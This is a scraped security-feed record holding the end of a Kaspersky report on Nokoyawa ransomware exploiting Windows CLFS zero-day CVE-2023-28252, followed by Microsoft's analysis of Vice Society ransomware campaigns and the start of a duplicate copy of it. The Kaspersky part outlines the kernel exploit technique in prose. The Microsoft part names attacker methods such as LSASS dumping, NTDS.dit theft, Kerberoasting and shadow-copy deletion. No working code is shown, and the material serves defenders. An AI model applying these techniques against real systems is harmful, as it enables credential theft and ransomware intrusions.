\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/04/11115128/Nokoyawa_ransomware_attacks_with_Windows_zero-day_01.png>)\n\n**_Nokoyawa ransom note_**\n\n## Elevation-of-privilege exploit\n\nThe attacker must be authenticated with user access and have the ability to run code on the target system to launch the elevation-of-privilege exploit.\n\nCLFS is a log file subsystem that was first introduced in Microsoft Windows Server 2003 R2 / Microsoft Vista and is implemented in the clfs.sys driver. This file system can be used by any application and Microsoft provides an [API](<https://learn.microsoft.com/en-us/previous-versions/windows/desktop/clfs/common-log-file-system-api>) for it. Logs are created using the [CreateLogFile](<https://learn.microsoft.com/en-us/windows/win32/api/clfsw32/nf-clfsw32-createlogfile>) function - a log is made up of a base log file (.blf file name extension) that is a master file containing metadata, and a number of containers that hold the actual data. Containers are created using the [AddLogContainer](<https://learn.microsoft.com/en-us/windows/win32/api/clfsw32/nf-clfsw32-addlogcontainer>) and [AddLogContainerSet](<https://learn.microsoft.com/en-us/windows/win32/api/clfsw32/nf-clfsw32-addlogcontainerset>) functions. As you may already guess, the base log files are the most interesting to look at. But while Microsoft provides an API for working with them, their file format is undocumented, and developers should interact with them only through the CLFS API. The file structure of base log files, when viewed briefly in a hex editor, does not seem very complicated, and Microsoft provides debug symbols for clfs.sys, so with a sufficient level of enthusiasm this format can be reverse engineered (already [done](<https://github.com/ionescu007/clfs-docs>) by Alex Ionescu). 
A glance at the structure of base log files instantly raises a red flag \u2013 the file consists of kernel structures as they are, and there are even fields for storing memory pointers! Combine that with the fact that, according to the API documentation, this technology is quite complicated, plus it was developed a long time ago, and we have a large number of vulnerabilities as a result. Searching for "Windows Common Log File System Driver Elevation Of Privilege Vulnerability" shows that there have been at least thirty-two such vulnerabilities (not counting CVE-2023-28252) discovered since 2018, three of which were detected in the wild as zero-days (CVE-2022-24521, CVE-2022-37969, CVE-2023-23376).\n\nCVE-2023-28252 is an out-of-bounds write (increment) vulnerability that can be exploited when the system attempts to extend a metadata block. The vulnerability is triggered by manipulating a base log file. At this time, we will not share the names of the fields or exact values that should be written to the file in order to trigger the vulnerability, as that information could facilitate further exploitation. This is to ensure that everyone has enough time to patch their systems before other actors develop their own exploits for CVE-2023-28252. Instead, we will share some general information about the vulnerability and the way of exploiting it. \n\nThe vulnerability is triggered in the CClfsBaseFilePersisted::ExtendMetadataBlock function when this function is executed as a result of a call to the AddLogContainer API function. There is a condition for the CClfsBaseFilePersisted::ExtendMetadataBlock function to be executed, and the base log file needs to be modified for that to happen. Besides, various fields in the CONTROL and CONTROL_SHADOW metadata blocks need to be patched. The exploit modifies LogBlockHeader->ValidSectorCount and various fields in LogBlockHeader->Record[0] for both the CONTROL and CONTROL_SHADOW metadata blocks. 
As a result of these changes, the CClfsBaseFilePersisted::ExtendMetadataBlock function performs out-of-bounds access to the m_rgBlocks array, which contains only six elements. After that, the CClfsBaseFilePersisted::WriteMetadataBlock function proceeds to use the value retrieved from the m_rgBlocks array as a pointer to the _CLFS_LOG_BLOCK_HEADER structure and increments LogBlockHeader->Record[0]->DumpCount and LogBlockHeader->Usn. This can be used to corrupt a kernel object in memory and obtain kernel read/write privileges if the address of the desired victim object is sprayed in the right location in memory.\n\nThe discovered exploit uses the vulnerability to corrupt another specially crafted base log file object in such a way that a fake element of the base log file gets treated as a real one. _CLFS_CONTAINER_CONTEXT is an example of a structure that gets stored in base log files but contains a field for storing a kernel pointer. Of course, the value of this field is ignored when the structure is read from the base log file on disk, but changing, in memory, the offset pointing to the valid _CLFS_CONTAINER_CONTEXT structure into an offset pointing to a specially crafted malicious _CLFS_CONTAINER_CONTEXT structure makes it possible to supply a pointer to attacker-controlled user-mode memory and obtain kernel read/write privileges with it.\n\nThe exploit leaks the addresses of kernel objects to achieve stable exploitation. This is done using the NtQuerySystemInformation function \u2013 a technique that we previously saw in other zero-days (e.g. the [PuzzleMaker](<https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>) and [MysterySnail](<https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/>) APT cases). The information classes used by the exploit require Medium IL to work.\n\nWe believe that CVE-2023-28252 could have been easily discovered with the help of fuzzing. 
But so many vulnerabilities have already been found in this component, so if it is discoverable by fuzzing, why was it not found before? We have a possible explanation. Examining the clfs.sys driver code in a disassembler shows extensive use of try/catch blocks to catch exceptions. In many parts of the code, when an exception occurs it gets masked by an exception handler and the code continues its normal execution as if nothing had happened. We verified that, with CVE-2023-28252, a possible access violation that follows triggering the vulnerability is masked by an exception handler. This makes us think that fuzzers were previously actually hitting this vulnerability, but because there was no crash it continued to go undiscovered. For effective fuzzing, it's necessary to keep in mind the possibility of such a scenario and to take steps to prevent it.\n\n## Post exploitation and malware\n\nWe see that the main purpose of using elevation-of-privilege exploits was to dump the contents of the HKEY_LOCAL_MACHINE\\SAM registry hive.\n\nAs for the malware, attackers use Cobalt Strike BEACON as their main tool. It's launched with a variety of custom loaders aimed at preventing AV detection.\n\nIn some of the other attacks that we attribute to the same actor, we also observed that, prior to exploiting the CLFS elevation-of-privilege vulnerability, the victim's machines were infected with a custom modular backdoor named "Pipemagic" that gets launched via an MSBuild script. At the end of last year, we published a private report about this malware for customers of the Kaspersky Intelligence Reporting service.\n\nIn attacks using the CVE-2023-28252 zero-day, this group attempted to deploy Nokoyawa ransomware as a final payload. Early variants of Nokoyawa were just "rebranded" variants of JSWorm ransomware, which we wrote about [previously](<https://securelist.com/evolution-of-jsworm-ransomware/102428/>). 
In this attack, cybercriminals used a newer version of Nokoyawa that is quite distinct from the JSWorm codebase. It's written in C and has encrypted strings. It was launched with an encrypted json config provided with a "-config" command line argument.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/04/10115431/Nokoyawa_ransomware_attacks_with_Windows_zero-day_02.png>)\n\n**_Decrypted and formatted config of Nokoyawa ransomware_**\n\n## Conclusions\n\nWe see a significantly increasing level of sophistication among cybercriminal groups. We don't often see APTs using zero-day exploits in their attacks, and now there are financially motivated cybercriminal groups that have the resources to acquire exploits for unknown vulnerabilities and routinely use them in attacks. Moreover, there are developers willing to help cybercriminal groups and to produce one exploit after another.\n\nWe detect the CVE-2023-28252 exploit and related malware with the verdicts:\n\n * PDM:Exploit.Win32.Generic\n * PDM:Trojan.Win32.Generic\n * HEUR:Trojan-Ransom.Win32.Generic\n * Win64.Agent*\n\nKaspersky products detected these attacks with the help of the Behavioral Detection Engine and the Exploit Prevention component. CVE-2023-28252 is the latest addition to the long list of zero-days discovered in the wild with the help of our technologies. We will continue to improve defenses for our users by enhancing technologies and working with third-party vendors to patch vulnerabilities, making the internet more secure for everyone.\n\nMore information about this and related attacks is available to customers of the Kaspersky Intelligence Reporting service. 
Contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n_Kaspersky would like to thank Microsoft for their prompt analysis of the report and patches._\n\n## Indicators of compromise\n\nAfter finishing, the exploit leaves files used for exploitation at the hard-coded path in the "C:\\Users\\Public\\" folder. Companies can check if the exploit was launched on their servers or employees' machines by looking for the presence of the "C:\\Users\\Public\\\\.container*", "C:\\Users\\Public\\MyLog*.blf", and "C:\\Users\\Public\\p_*" files.\n\n**Exploitation artifacts** \nC:\\Users\\Public\\\\.container* \nC:\\Users\\Public\\MyLog*.blf \nC:\\Users\\Public\\p_*", "cvss3": {"exploitabilityScore": 1.8, 
"cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-04-11T17:36:20", "type": "securelist", "title": "Nokoyawa ransomware attacks with Windows zero-day", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24521", "CVE-2022-37969", "CVE-2023-23376", "CVE-2023-28252"], "modified": "2023-04-11T17:36:20", "id": "SECURELIST:2A8910B73BBDBE37391EE4739A773C24", "href": "https://securelist.com/nokoyawa-ransomware-attacks-with-windows-zero-day/109483/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "mssecure": [{"lastseen": "2022-10-25T16:02:24", "description": "In recent months, Microsoft has detected active ransomware and extortion campaigns impacting the global education sector, particularly in the US, by a threat actor we track as DEV-0832, also known as Vice Society. 
Shifting ransomware payloads over time from [BlackCat](<https://www.microsoft.com/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/>), [QuantumLocker](<https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/>), and [Zeppelin](<https://www.cisa.gov/uscert/ncas/alerts/aa22-223a>), DEV-0832\u2019s latest payload is a Zeppelin variant that includes Vice Society-specific file extensions, such as _.v-s0ciety_, ._v-society_, and, most recently, _.locked_. In several cases, Microsoft assesses that the group did not deploy ransomware and instead possibly performed extortion using only exfiltrated stolen data.\n\nDEV-0832 is a cybercriminal group that has reportedly been active as early as June 2021. While the latest attacks between July and October 2022 have heavily impacted the education sector, DEV-0832\u2019s previous opportunistic attacks have affected various industries like local government and retail. Microsoft assesses that the group is financially motivated and continues to focus on organizations where there are weaker security controls and a higher likelihood of compromise and ransom payout. Before deploying ransomware, DEV-0832 relies on tactics, techniques, and procedures commonly used among other ransomware actors, including the use of PowerShell scripts, repurposed legitimate tools, exploits for publicly disclosed vulnerabilities for initial access and post-compromise elevation of privilege, and commodity backdoors like _SystemBC_.\n\nRansomware has evolved into a complex threat that\u2019s human-operated, adaptive, and focused on a wider scale, using data extortion as a monetization strategy to become even more impactful in recent years. To find easy entry and privilege escalation points in an environment, these attackers often take advantage of poor credential hygiene and legacy configurations or misconfigurations. 
Defenders can build a robust defense against ransomware by reading our [ransomware as a service blog](<https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/>).\n\nIn this blog, we detail Microsoft\u2019s analysis of observed DEV-0832 activity, including the tactics and techniques used across the group\u2019s campaigns, with the goal of helping customers identify, investigate, and remediate activity in their environments. We provide hunting queries to help customers comprehensively search their environments for relevant indicators as well as protection and hardening guidance to help organizations increase resilience against these and similar attacks.\n\n## Who is DEV-0832 (Vice Society)?\n\nMicrosoft has identified multiple campaigns attributed to DEV-0832 over the past year based on the use of a unique PowerShell file name, staging directories, and ransom payloads and their accompanying notes. To gain an initial foothold in compromised networks, DEV-0832 has [reportedly exploited vulnerable web-facing applications and used valid accounts](<https://www.cisa.gov/uscert/ncas/alerts/aa22-249a>). However, due to limited initial signals from affected organizations, Microsoft has not confirmed these attack vectors. Attackers then use custom PowerShell scripts, commodity tools, exploits for disclosed vulnerabilities, and native Windows binaries to gather privileged credentials, move laterally, collect and exfiltrate data, and deploy ransomware.\n\nAfter deploying ransomware, DEV-0832 demands a ransom payment, threatening to leak stolen data on the group\u2019s _[.]onion_ site. In some cases, Microsoft observed that DEV-0832 did not deploy ransomware. Instead, the actors appeared to exfiltrate data and dwell within compromised networks. 
The group sometimes avoids a ransomware payload in favor of simple extortion\u2014threatening to release stolen data unless a payment is made.\n\nThe group also goes to significant measures to ensure that an organization cannot recover from the attack without paying the ransom: Microsoft has observed DEV-0832 access two domain administrator accounts and reset the passwords of over 150,000 users, essentially locking out legitimate users before deploying ransomware to some devices. This effectively interrupts remediation efforts, including attempts to prevent the ransomware payload or post-compromise incident response.\n\n### Toolset\n\n#### Ransomware payloads\n\nMicrosoft has observed DEV-0832 deploy multiple commodity ransomware variants over the past year: BlackCat, QuantumLocker, Zeppelin, and most recently a Vice Society-branded variant of the Zeppelin ransomware. While many ransomware groups have shifted away from branded file extensions in favor of randomly generated ones, DEV-0832 incorporated branding with their Vice Society variant using _.v-s0ciety_ or _.v-society_ file extensions. Most recently, in late September 2022, DEV-0832 again modified their ransomware payload to a variant dubbed RedAlert, using a _.locked_ file extension.\n\nIn one July 2022 intrusion, Microsoft security researchers observed DEV-0832 attempting to deploy QuantumLocker binaries and then, within five hours, attempting to deploy suspected Zeppelin ransomware binaries. Such an incident might suggest that DEV-0832 maintains multiple ransomware payloads and switches depending on target defenses or, alternatively, that dispersed operators working under the DEV-0832 umbrella might maintain their own preferred ransomware payloads for distribution. 
The shift from a [ransomware as a service](<https://aka.ms/ransomware-as-a-service>) (RaaS) offering (BlackCat) to a purchased wholly-owned malware offering (Zeppelin) and a custom Vice Society variant indicates DEV-0832 has active ties in the cybercriminal economy and has been testing ransomware payload efficacy or post-ransomware extortion opportunities.\n\nIn many intrusions, DEV-0832 stages their ransomware payloads in a hidden share on a Windows system, for example accessed via a share name containing \u201c$\u201d. Once DEV-0832 has exfiltrated data, they then distribute the ransomware onto local devices for launching, likely using group policy, as shown in the below command:\n\nFigure 1. Group policy to distribute ransomware onto local devices\n\nThe group also has cross-platform capabilities: Microsoft identified the deployment of a Vice Society Linux Encryptor on a Linux ESXi server.\n\n#### PowerShell scripts\n\nDEV-0832 uses a PowerShell script to conduct a variety of malicious activities and make system-related changes within compromised networks. Like their ransomware payloads, DEV-0832 typically stages their PowerShell scripts on a domain controller.\n\nMicrosoft security researchers have observed several variations among identified DEV-0832 PowerShell scripts, indicating ongoing refinement and development over time\u2014while some only perform system discovery commands, other scripts are further modified to perform persistence, defense evasion, data exfiltration, and even distribute the ransomware payloads.\n\n#### Commodity tools\n\nAccording to Microsoft investigations, DEV-0832 has used two commodity backdoors in ransomware attacks: _SystemBC_ and _PortStarter_.\n\n_SystemBC_ is a post-compromise commodity remote access trojan (RAT) and proxy tool that has been incorporated into multiple diverse ransomware attacks. 
In one DEV-0832 intrusion, the attacker used both a compromised domain admin user account and a compromised contractor account to launch a PowerShell command that launched a _SystemBC_ session under the value name \u201csocks\u201d:\n\nFigure 2. PowerShell command launching a SystemBC session named \u2018socks\u2019\n\n_PortStarter_ is a backdoor written in Go. According to Microsoft analysis, this malware provides functionality such as modifying firewall settings and opening ports to connect to pre-configured command-and-control (C2) servers.\n\nDEV-0832 has also deployed ransomware payloads using the remote launching tool Power Admin. Power Admin is a legitimate tool that provides functionality to monitor servers and applications, as well as file access auditing. If an organization has enabled Console Security settings within Power Admin, an attacker must have credentials to make authorized changes.\n\nOther commodity tools identified in DEV-0832 attacks include Advanced Port Scanner and Advanced IP Scanner for network discovery.\n\n#### Abuse of legitimate tooling\n\nLike many other ransomware actors, DEV-0832 relies on misusing legitimate system tools to reduce the need to launch malware or malicious scripts that automated security solutions might detect. 
Observed tools include:\n\n * Use of the [Windows Management Instrumentation Command-line](<https://learn.microsoft.com/windows/win32/wmisdk/wmic>) (WMIC) to launch commands that delete Mongo databases, other backups, and security programs.\n * Use of Impacket\u2019s WMIexec functionality, an open-source tool to launch commands via WMI, and Impacket _atexec.py_, which launches commands using Task Scheduler.\n * Use of the [vssadmin](<https://learn.microsoft.com/windows-server/administration/windows-commands/vssadmin>) command to delete shadow copy backups on Windows Server.\n * Use of [PsExec](<https://learn.microsoft.com/sysinternals/downloads/psexec>) to remotely launch PowerShell and batch scripts, and to deploy ransomware payloads.\n\nAdditionally, in one identified intrusion, DEV-0832 attempted to turn off Microsoft Defender Antivirus using registry commands. [Enabling Microsoft Defender Antivirus tamper protection](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection>) helps block this type of activity.\n\nFigure 3. Registry commands that attempt to tamper with Microsoft Defender antivirus software\n\n### Harvesting privileged credentials for ransomware deployment\n\nLike other ransomware groups, after gaining an initial foothold within a network, DEV-0832 moves quickly to gather valid local administrator or domain credentials to ensure they can distribute ransomware payloads throughout the network for maximum impact.\n\n#### Credential dumps\n\nWhile Microsoft has not identified all the credential access techniques of DEV-0832, in many instances DEV-0832 accesses Local Security Authority Server Service (LSASS) dumps to obtain valid account credentials that were present in memory. Microsoft also observed that, instead of using a tool like Mimikatz to access a credential dump, DEV-0832 typically abuses the tool _comsvcs.dll_ along with MiniDump to dump the LSASS process memory. 
Other ransomware actors have been observed using the same technique.\n\nIn cases where DEV-0832 obtained domain-level administrator accounts, they accessed NTDS dumps for later cracking. The following command shows the attacker exfiltrating the _NTDS.dit_ file, which stores Active Directory data, to an actor-created directory:\n\nFigure 4. Example of attacker command to exfiltrate the \u2018NTDS.dit\u2019 file\n\n#### Kerberoast\n\nMicrosoft has also identified that DEV-0832 used the malicious PowerSploit module [_Invoke-Kerberoast_](<https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/>) to perform a Kerberoast attack, which is a post-exploitation technique used to obtain credentials for a service account from Active Directory Domain Services (AD DS). The _Invoke-Kerberoast_ module requests encrypted service tickets and returns them in an attacker-specified output format compatible with cracking tools. The group can use the cracked Kerberos hashes to reveal passwords for service accounts, often providing access to an account that has the equivalent of domain admin privileges. Furthermore, one Kerberos service ticket can have many associated service principal names (SPNs); successful Kerberoasting can then grant an attacker access to the SPNs\u2019 associated service or user accounts, such as obtaining ticket granting service (TGS) tickets for Active Directory SPNs that would allow an attacker to do offline password cracking.\n\nCombined with the fact that service account passwords are not usually set to expire and typically remain unchanged for a great length of time, attackers like DEV-0832 continue to rely on Kerberoasting in compromised networks. Microsoft 365 Defender blocks this attack with Antimalware Scan Interface (AMSI) and machine learning. 
Monitor for alerts that reference Kerberoast attacks closely as the presence of these alerts typically indicates a human adversary in your environment.\n\n#### Account creation\n\nIn one suspected DEV-0832 intrusion, Microsoft observed an operator create accounts that, based on the naming convention, were designed to blend in as admin accounts and allow persistence without malware, as shown in the following command:\n\nFigure 5. Attacker command to create accounts\n\nMonitoring newly created accounts can help identify this type of suspicious activity that does not rely on launching malware for persistence in the environment.\n\n#### Exploitation of privilege escalation vulnerabilities\n\nIn August 2022, Microsoft security researchers identified one file during a DEV-0832 intrusion indicating that the group has incorporated an exploit for the disclosed, patched security flaw [CVE-2022-24521](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24521>) (Windows Common Log File System (CLFS) logical-error vulnerability). Microsoft released a patch in April 2022. The DEV-0832 file spawns a new _cmd.exe_ process with system privileges.\n\nAccording to public reporting, DEV-0832 has also incorporated exploits for the [PrintNightmare](<https://www.cisa.gov/uscert/ncas/alerts/aa22-249a>) vulnerability to escalate privileges in a domain. Combined with the CVE-2022-24521 exploit code, it is likely that DEV-0832, like many other adversaries, quickly incorporates available exploit code for disclosed vulnerabilities into their toolset to target unpatched systems.\n\n#### Lateral movement with valid accounts\n\nAfter gaining credentials, DEV-0832 frequently moves laterally within a network using Remote Desktop Protocol (RDP). 
And as previously mentioned, DEV-0832 has also used valid credentials to interact with remote network shares over Server Message Block (SMB) where they stage ransomware payloads and PowerShell scripts.\n\n### Data exfiltration\n\nIn one known intrusion, DEV-0832 operators exfiltrated hundreds of gigabytes of data by launching their PowerShell script, which was staged on a network share. The script contained hardcoded attacker-owned IP addresses and searched for wide-ranging, non-targeted keywords ranging from financial documents to medical information, while excluding files containing keywords such as varied antivirus product names or file artifact extensions. Given the wide range of keywords included in the script, it is unlikely that DEV-0832 regularly customizes it for each target.\n\nMicrosoft suspects that DEV-0832 uses legitimate tools Rclone and MegaSync for data exfiltration as well; many ransomware actors leverage these tools, which provide capabilities to upload files to cloud storage. DEV-0832 also uses file compression tools to collect data from compromised devices.\n\n## Mitigations\n\nApply these mitigations to reduce the impact of this threat:\n\n * Use [device discovery](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/device-discovery>) to increase your visibility into your network by finding unmanaged devices on your network and onboarding them to Microsoft Defender for Endpoint.\n * Use [Microsoft Defender Vulnerability Management](<https://security.microsoft.com/vulnerabilities>) to assess your current status and deploy any updates that might have been missed.\n * Utilize [Microsoft Defender Firewall](<https://support.microsoft.com/windows/turn-microsoft-defender-firewall-on-or-off-ec0844f7-aebd-0583-67fe-601ecf5d774f>), intrusion prevention devices, and your network firewall to prevent RPC and SMB communication among endpoints whenever possible. 
This limits lateral movement as well as other attack activities.\n * Turn on [cloud-delivered protection](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus>) in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.\n * Turn on [tamper protection](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>) features to prevent attackers from stopping security services.\n * Run [endpoint detection and response (EDR) in block mode](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode>) so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus doesn\u2019t detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.\n * Enable [investigation and remediation](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations>) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.\n * [LSA protection](<https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection>) is enabled by default on new Windows 11 devices, hardening the platform against credential dumping techniques. 
LSA PPL protection will further restrict access to memory dumps making it hard to obtain credentials.\n * Refer to Microsoft\u2019s blog [Ransomware as a service: Understanding the cybercrime gig economy and how to protect yourself](<https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/#defending-against-ransomware>) for recommendations on building strong credential hygiene and other robust measures to defend against ransomware.\n\nMicrosoft customers can turn on [attack surface reduction rules](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction>) to prevent several of the infection vectors of this threat. These rules, which can be configured by any administrator, offer significant hardening against ransomware attacks. In observed attacks, Microsoft customers who had the following rules enabled were able to mitigate the attack in the initial stages and prevented hands-on-keyboard activity:\n\n * [Block process creations originating from PsExec and WMI commands](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference?#block-process-creations-originating-from-psexec-and-wmi-commands>)\n * [Block executable files from running unless they meet a prevalence, age, or trusted list criterion](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference#block-executable-files-from-running-unless-they-meet-a-prevalence-age-or-trusted-list-criterion>)\n * [Use advanced protection against ransomware](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference#use-advanced-protection-against-ransomware>)\n * [Block credential stealing from the Windows local security authority subsystem 
(lsass.exe)](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference#block-credential-stealing-from-the-windows-local-security-authority-subsystem>)\n\n## Detection details\n\n### Microsoft Defender Antivirus\n\n[Microsoft Defender Antivirus](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/microsoft-defender-antivirus-windows?view=o365-worldwide>) detects DEV-0832\u2019s Vice Society-branded Zeppelin variant as the following malware:\n\n * [Ransom:Win32/VSocCrypt](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/VSocCrypt.PA!MTB&threatId=-2147138765>)\n * [Trojan:PowerShell/VSocCrypt](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:PowerShell/VSocCrypt.PA!MTB&threatId=-2147136227>)\n * [Ransom:Linux/ViceSociety](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Linux/ViceSociety.D!MTB&threatId=-2147136262>)\n\nOther commodity ransomware variants previously leveraged by DEV-0832 are detected as:\n\n * [Behavior:Win32/Ransomware!Quantum.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/Ransomware!Quantum.A&threatId=-2147147947>)\n * [Behavior:Win32/Quantum.AA](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/Quantum.AA&threatId=-2147147852>)\n * [Ransom:Win32/Zeppelin](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Zeppelin&threatId=-2147188430>)\n * [Ransom:Win32/Blackcat](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Blackcat&threatId=-2147158032>)\n\n_SystemBC_ and _PortStarter_ are detected as:\n\n * 
[Behavior:Win32/SystemBC](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/SystemBC.A!nri&threatId=-2147149800>)\n * [Trojan:Win32/SystemBC](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/SystemBC.SA!sms&threatId=-2147150468>)\n * [Backdoor:Win64/PortStarter](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Win64/PortStarter&threatId=-2147137231>)\n\nSome pre-ransomware intrusion activity used in multiple campaigns by various activity groups can be detected generically. During identified DEV-0832 activity, associated command line activity was detected with generic detections, including:\n\n * Behavior:Win32/OfficeInjectingProc.A\n * Behavior:Win32/PsexecRemote.E\n * Behavior:Win32/SuspRemoteCopy.B\n * Behavior:Win32/PSCodeInjector.A\n * Behavior:Win32/REnamedPowerShell.A\n\n### Microsoft Defender for Endpoint\n\nThe following [Microsoft Defender for Endpoint](<https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-endpoint?rtc=1>) alerts can indicate threat activity on your network:\n\n * DEV-0832 activity group\n * 'VSocCrypt' ransomware was prevented\n\nThe following alerts might also indicate threat activity associated with this threat. 
These alerts, however, can be triggered by unrelated threat activity.\n\n * Use of living-off-the-land binary to run malicious code\n * Potential SystemBC execution via Windows Task Scheduler\n * Suspicious sequence of exploration activities\n * Process memory dump\n * Suspicious behavior by cmd.exe was observed\n * Suspicious remote activity\n * Suspicious access to LSASS service\n * Suspicious credential dump from NTDS.dit\n * File backups were deleted\n * System recovery setting tampering\n\nThe post [DEV-0832 (Vice Society) opportunistic ransomware campaigns impacting US education sector](<https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/en-us/security/blog>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-25T16:00:00", "type": "mssecure", "title": "DEV-0832 (Vice Society) opportunistic ransomware campaigns impacting US education sector", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24521"], "modified": 
"2022-10-25T16:00:00", "id": "MSSECURE:123BB884C96F0D2CEEB22B6F3B90BCB4", "href": "https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "mmpc": [{"lastseen": "2022-10-25T23:14:08", "description": "In recent months, Microsoft has detected active ransomware and extortion campaigns impacting the global education sector, particularly in the US, by a threat actor we track as DEV-0832, also known as Vice Society. Shifting ransomware payloads over time from [BlackCat](<https://www.microsoft.com/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/>), [QuantumLocker](<https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/>), and [Zeppelin](<https://www.cisa.gov/uscert/ncas/alerts/aa22-223a>), DEV-0832\u2019s latest payload is a Zeppelin variant that includes Vice Society-specific file extensions, such as _.v-s0ciety_, ._v-society_, and, most recently, _.locked_. In several cases, Microsoft assesses that the group did not deploy ransomware and instead possibly performed extortion using only exfiltrated stolen data.\n\nDEV-0832 is a cybercriminal group that has reportedly been active as early as June 2021. While the latest attacks between July and October 2022 have heavily impacted the education sector, DEV-0832\u2019s previous opportunistic attacks have affected various industries like local government and retail. Microsoft assesses that the group is financially motivated and continues to focus on organizations where there are weaker security controls and a higher likelihood of compromise and ransom payout. 
